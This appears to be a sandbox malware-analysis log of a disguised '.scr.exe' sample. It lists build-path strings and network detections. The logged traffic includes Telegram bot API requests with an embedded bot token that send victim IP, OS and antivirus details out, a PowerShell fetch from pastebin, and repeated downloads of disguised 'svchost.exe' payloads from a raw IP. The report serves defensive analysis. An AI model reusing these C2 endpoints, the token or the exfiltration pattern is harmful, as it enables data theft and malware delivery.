Source: Binary string: System.Memory.ni.pdb source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3168744151.000002980CA01000.00000020.00001000.00020000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3161453512.0000029808CA8000.00000004.00000020.00020000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3167910590.000002980C4A0000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\Microsoft.Win32.Primitives\Release\net8.0\Microsoft.Win32.Primitives.pdb source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3160623783.0000029808800000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3158687208.0000025771EE1000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Reflection.Primitives\Release\net8.0\System.Reflection.Primitives.pdb source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3167883026.000002980C490000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3167851335.000002980C481000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: System.Private.DataContractSerialization.ni.pdb source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3165946958.000002980BB30000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3166181193.000002980BC11000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Threading.ThreadPool\Release\net8.0\System.Threading.ThreadPool.pdb source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3165358680.000002980BAC0000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3165286031.000002980BAB1000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.Security\Release\net8.0-windows\System.Net.Security.pdb source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3163793512.000002980B770000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3163937013.000002980B7C1000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: System.Collections.ni.pdb source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3165666377.000002980BB01000.00000020.00001000.00020000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3165504033.000002980BAE0000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.Http\Release\net8.0-windows\System.Net.Http.pdbSHA256 source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3163102585.000002980B590000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3163286392.000002980B641000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: System.Private.CoreLib.ni.pdb source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3160643230.0000029808810000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3161677504.0000029808DB1000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: /_/artifacts/obj/System.Management/Release/net8.0-windows/System.Management.pdbSHA256 source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3167964729.000002980C4D0000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3168032463.000002980C521000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Runtime.Loader\Release\net8.0\System.Runtime.Loader.pdb source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3165863155.000002980BB21000.00000020.00001000.00020000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3166308984.000002980BD10000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Private.Uri\Release\net8.0\System.Private.Uri.pdb source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3163977952.000002980B810000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3163418543.000002980B6F1000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.Primitives\Release\net8.0-windows\System.Net.Primitives.pdb source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3160491827.0000029808791000.00000020.00001000.00020000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3160514082.00000298087B0000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: System.Security.Cryptography.ni.pdb source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3164385610.000002980B931000.00000020.00001000.00020000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3164165214.000002980B870000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: System.Private.Xml.ni.pdb source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3167376562.000002980C121000.00000020.00001000.00020000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3166893087.000002980BE20000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: 8C:\Users\user\AppData\Local\Temp\xy2h0pkm\xy2h0pkm.pdb source: powershell.exe, 00000004.00000002.2110018131.000001F7016FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: System.Collections.Specialized.ni.pdb source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3168246148.000002980C5C0000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3168187257.000002980C5A1000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Xml.ReaderWriter\Release\net8.0\System.Xml.ReaderWriter.pdb source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3165424131.000002980BAD0000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3160601511.00000298087F1000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Reflection.Emit.ILGeneration\Release\net8.0\System.Reflection.Emit.ILGeneration.pdb source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3166578673.000002980BD50000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3166519143.000002980BD41000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: System.Runtime.Serialization.Primitives.ni.pdb source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3166397720.000002980BD21000.00000020.00001000.00020000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3166461733.000002980BD30000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: System.Runtime.InteropServices.ni.pdb source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3160232189.0000029808681000.00000020.00001000.00020000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3160252767.0000029808690000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Linq\Release\net8.0\System.Linq.pdbSHA256R source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3166713900.000002980BD91000.00000020.00001000.00020000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3166604611.000002980BD60000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Threading\Release\net8.0\System.Threading.pdb source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3160343247.00000298086C1000.00000020.00001000.00020000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3160361987.00000298086D0000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: /_/artifacts/obj/System.Private.DataContractSerialization/Release/net8.0/System.Private.DataContractSerialization.pdb source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3165946958.000002980BB30000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3166181193.000002980BC11000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Threading.Thread\Release\net8.0\System.Threading.Thread.pdbSHA256 source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3168130282.000002980C590000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3168102003.000002980C581000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: System.Security.Claims.ni.pdb source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159661089.0000025773A30000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159580002.00000257739E1000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: System.Text.RegularExpressions.ni.pdb source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3167776836.000002980C420000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3166830112.000002980BDC1000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\coreclr\windows.x64.Release\Corehost.Static\singlefilehost.pdb source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3188177414.00007FF6A7FDD000.00000002.00000001.01000000.00000003.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000000.2057822710.00007FF6A7FDD000.00000002.00000001.01000000.00000003.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.Http\Release\net8.0-windows\System.Net.Http.pdb source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3163102585.000002980B590000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3163286392.000002980B641000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\coreclr\System.Private.CoreLib\x64\Release\System.Private.CoreLib.pdb source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3160643230.0000029808810000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3161677504.0000029808DB1000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Runtime.Serialization.Primitives\Release\net8.0\System.Runtime.Serialization.Primitives.pdbSHA256 source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3166397720.000002980BD21000.00000020.00001000.00020000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3166461733.000002980BD30000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Reflection.Emit.ILGeneration\Release\net8.0\System.Reflection.Emit.ILGeneration.pdbSHA256 source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3166578673.000002980BD50000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3166519143.000002980BD41000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Memory\Release\net8.0\System.Memory.pdb source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3168744151.000002980CA01000.00000020.00001000.00020000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3161453512.0000029808CA8000.00000004.00000020.00020000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3167910590.000002980C4A0000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.ComponentModel.Primitives\Release\net8.0\System.ComponentModel.Primitives.pdb source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159462177.0000025773990000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159341485.0000025773951000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.ServicePoint\Release\net8.0\System.Net.ServicePoint.pdbSHA256 source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3168389200.000002980C5F0000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3168325428.000002980C5E1000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: System.Net.NameResolution.ni.pdb source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3165182661.000002980BAA1000.00000020.00001000.00020000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3164742088.000002980BA10000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: System.Console.ni.pdb source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3160412636.0000029808700000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3160451868.0000029808721000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.Sockets\Release\net8.0-windows\System.Net.Sockets.pdb source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3165031754.000002980BA61000.00000020.00001000.00020000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3164868495.000002980BA20000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Security.Claims\Release\net8.0\System.Security.Claims.pdb source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159661089.0000025773A30000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159580002.00000257739E1000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: System.Diagnostics.DiagnosticSource.ni.pdb source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3163503853.000002980B710000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3163706047.000002980B741000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: System.Net.Http.ni.pdb source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3163102585.000002980B590000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3163286392.000002980B641000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: System.Threading.ni.pdb source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3160343247.00000298086C1000.00000020.00001000.00020000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3160361987.00000298086D0000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Runtime\Release\net8.0\System.Runtime.pdb source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159219363.0000025773920000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159195195.0000025773911000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Runtime.InteropServices\Release\net8.0\System.Runtime.InteropServices.pdb source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3160232189.0000029808681000.00000020.00001000.00020000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3160252767.0000029808690000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: System.Net.ServicePoint.ni.pdb source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3168389200.000002980C5F0000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3168325428.000002980C5E1000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Collections.Specialized\Release\net8.0\System.Collections.Specialized.pdb source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3168246148.000002980C5C0000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3168187257.000002980C5A1000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.ServicePoint\Release\net8.0\System.Net.ServicePoint.pdb source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3168389200.000002980C5F0000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3168325428.000002980C5E1000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Text.RegularExpressions\Release\net8.0\System.Text.RegularExpressions.pdb source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3167776836.000002980C420000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3166830112.000002980BDC1000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Threading.ThreadPool\Release\net8.0\System.Threading.ThreadPool.pdbSHA2560 source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3165358680.000002980BAC0000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3165286031.000002980BAB1000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Security.Principal.Windows\Release\net8.0-windows\System.Security.Principal.Windows.pdb source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159637398.0000025773A11000.00000020.00001000.00020000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159598217.00000257739F0000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: System.Net.Primitives.ni.pdb source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3160491827.0000029808791000.00000020.00001000.00020000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3160514082.00000298087B0000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: /_/artifacts/obj/System.Management/Release/net8.0-windows/System.Management.pdb source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3167964729.000002980C4D0000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3168032463.000002980C521000.00000020.00001000.00020000.00000000.sdmp

Networking

barindex
Suricata IDS alerts for network traffic
Source: Network trafficSuricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.5:49726 -> 149.154.167.220:443
Source: Network trafficSuricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.5:59790 -> 149.154.167.220:443
Source: Network trafficSuricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.5:59791 -> 149.154.167.220:443
Connects to a pastebin service (likely for C&C)
Source: unknownDNS query: name: pastebin.com
Uses the Telegram API (likely for C&C communication)
Source: unknownDNS query: name: api.telegram.org
Source: unknownDNS query: name: api.telegram.org
Source: global trafficTCP traffic: 192.168.2.5:60779 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.5:59545 -> 1.1.1.1:53
Source: global trafficHTTP traffic detected: GET /bot7877511610:AAFUatIaHUDXQJtLE_epVwwwm3che0AiuJY/sendMessage?chat_id=-1002264615855&text=%F0%9F%8F%B4%20%20Country%3A%20United%20States%0A%E2%9C%96%EF%B8%8F%20IP%3A%208.46.123.189%0A%E2%9C%96%EF%B8%8F%20Antivirus%3A%20Windows%20Defender%0A%E2%9C%96%EF%B8%8F%20OS%3A%20Microsoft%20Windows%2010%20Pro%0A%E2%9C%96%EF%B8%8F%20Language%3A%20English%20%28Switzerland%29%0A HTTP/1.1Host: api.telegram.org
Source: global trafficHTTP traffic detected: POST /bot7877511610:AAFUatIaHUDXQJtLE_epVwwwm3che0AiuJY/sendMessage HTTP/1.1Host: api.telegram.orgContent-Type: application/x-www-form-urlencodedContent-Length: 138
Source: global trafficHTTP traffic detected: POST /bot7877511610:AAFUatIaHUDXQJtLE_epVwwwm3che0AiuJY/sendMessage HTTP/1.1Host: api.telegram.orgContent-Type: application/x-www-form-urlencodedContent-Length: 138
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
Source: global trafficHTTP traffic detected: GET /json/8.46.123.189 HTTP/1.1Host: ip-api.com
Source: global trafficHTTP traffic detected: GET /TeamBuild/win64_svchost.exe HTTP/1.1Host: 89.23.97.214
Source: global trafficHTTP traffic detected: GET /TeamBuild/win32_svchost.exe HTTP/1.1Host: 89.23.97.214
Source: global trafficHTTP traffic detected: GET /TeamBuild/win32_svchost.exe HTTP/1.1Host: 89.23.97.214
Source: global trafficHTTP traffic detected: GET /TeamBuild/win64_svchost.exe HTTP/1.1Host: 89.23.97.214
Source: global trafficHTTP traffic detected: GET /TeamBuild/win32_svchost.exe HTTP/1.1Host: 89.23.97.214
Source: global trafficHTTP traffic detected: GET /TeamBuild/win64_svchost.exe HTTP/1.1Host: 89.23.97.214
Source: global trafficHTTP traffic detected: GET /TeamBuild/win64_svchost.exe HTTP/1.1Host: 89.23.97.214
Source: global trafficHTTP traffic detected: GET /TeamBuild/win32_svchost.exe HTTP/1.1Host: 89.23.97.214
Source: Joe Sandbox ViewIP Address: 208.95.112.1 208.95.112.1
Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox ViewIP Address: 172.67.19.24 172.67.19.24
Source: Joe Sandbox ViewIP Address: 172.67.19.24 172.67.19.24
Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: unknownDNS query: name: api.ipify.org
Source: unknownDNS query: name: api.ipify.org
Source: unknownDNS query: name: ip-api.com
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49720 -> 208.95.112.1:80
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49714 -> 172.67.74.152:80
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:59789 -> 89.23.97.214:80
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:59786 -> 89.23.97.214:80
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:59671 -> 89.23.97.214:80
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:59672 -> 89.23.97.214:80
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:60791 -> 89.23.97.214:80
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:60792 -> 89.23.97.214:80
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:59787 -> 89.23.97.214:80
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:59788 -> 89.23.97.214:80
Source: Network trafficSuricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.5:49704 -> 172.67.19.24:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49726 -> 149.154.167.220:443
Source: global trafficHTTP traffic detected: GET /raw/WHKzW2nr HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: pastebin.comConnection: Keep-Alive
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 89.23.97.214
Source: unknownTCP traffic detected without corresponding DNS query: 89.23.97.214
Source: unknownTCP traffic detected without corresponding DNS query: 89.23.97.214
Source: unknownTCP traffic detected without corresponding DNS query: 89.23.97.214
Source: unknownTCP traffic detected without corresponding DNS query: 89.23.97.214
Source: unknownTCP traffic detected without corresponding DNS query: 89.23.97.214
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 89.23.97.214
Source: unknownTCP traffic detected without corresponding DNS query: 89.23.97.214
Source: unknownTCP traffic detected without corresponding DNS query: 89.23.97.214
Source: unknownTCP traffic detected without corresponding DNS query: 89.23.97.214
Source: unknownTCP traffic detected without corresponding DNS query: 89.23.97.214
Source: unknownTCP traffic detected without corresponding DNS query: 89.23.97.214
Source: unknownTCP traffic detected without corresponding DNS query: 89.23.97.214
Source: unknownTCP traffic detected without corresponding DNS query: 89.23.97.214
Source: unknownTCP traffic detected without corresponding DNS query: 89.23.97.214
Source: unknownTCP traffic detected without corresponding DNS query: 89.23.97.214
Source: unknownTCP traffic detected without corresponding DNS query: 89.23.97.214
Source: unknownTCP traffic detected without corresponding DNS query: 89.23.97.214
Source: unknownTCP traffic detected without corresponding DNS query: 89.23.97.214
Source: unknownTCP traffic detected without corresponding DNS query: 89.23.97.214
Source: unknownTCP traffic detected without corresponding DNS query: 89.23.97.214
Source: unknownTCP traffic detected without corresponding DNS query: 89.23.97.214
Source: unknownTCP traffic detected without corresponding DNS query: 89.23.97.214
Source: unknownTCP traffic detected without corresponding DNS query: 89.23.97.214
Source: unknownTCP traffic detected without corresponding DNS query: 89.23.97.214
Source: unknownTCP traffic detected without corresponding DNS query: 89.23.97.214
Source: unknownTCP traffic detected without corresponding DNS query: 89.23.97.214
Source: unknownTCP traffic detected without corresponding DNS query: 89.23.97.214
Source: unknownTCP traffic detected without corresponding DNS query: 89.23.97.214
Source: unknownTCP traffic detected without corresponding DNS query: 89.23.97.214
Source: unknownTCP traffic detected without corresponding DNS query: 89.23.97.214
Source: unknownTCP traffic detected without corresponding DNS query: 89.23.97.214
Source: unknownTCP traffic detected without corresponding DNS query: 89.23.97.214
Source: unknownTCP traffic detected without corresponding DNS query: 89.23.97.214
Source: unknownTCP traffic detected without corresponding DNS query: 89.23.97.214
Source: unknownTCP traffic detected without corresponding DNS query: 89.23.97.214
Source: unknownTCP traffic detected without corresponding DNS query: 89.23.97.214
Source: unknownTCP traffic detected without corresponding DNS query: 89.23.97.214
Source: unknownTCP traffic detected without corresponding DNS query: 89.23.97.214
Source: unknownTCP traffic detected without corresponding DNS query: 89.23.97.214
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /raw/WHKzW2nr HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: pastebin.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /bot7877511610:AAFUatIaHUDXQJtLE_epVwwwm3che0AiuJY/sendMessage?chat_id=-1002264615855&text=%F0%9F%8F%B4%20%20Country%3A%20United%20States%0A%E2%9C%96%EF%B8%8F%20IP%3A%208.46.123.189%0A%E2%9C%96%EF%B8%8F%20Antivirus%3A%20Windows%20Defender%0A%E2%9C%96%EF%B8%8F%20OS%3A%20Microsoft%20Windows%2010%20Pro%0A%E2%9C%96%EF%B8%8F%20Language%3A%20English%20%28Switzerland%29%0A HTTP/1.1Host: api.telegram.org
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
Source: global trafficHTTP traffic detected: GET /json/8.46.123.189 HTTP/1.1Host: ip-api.com
Source: global trafficHTTP traffic detected: GET /TeamBuild/win64_svchost.exe HTTP/1.1Host: 89.23.97.214
Source: global trafficHTTP traffic detected: GET /TeamBuild/win32_svchost.exe HTTP/1.1Host: 89.23.97.214
Source: global trafficHTTP traffic detected: GET /TeamBuild/win32_svchost.exe HTTP/1.1Host: 89.23.97.214
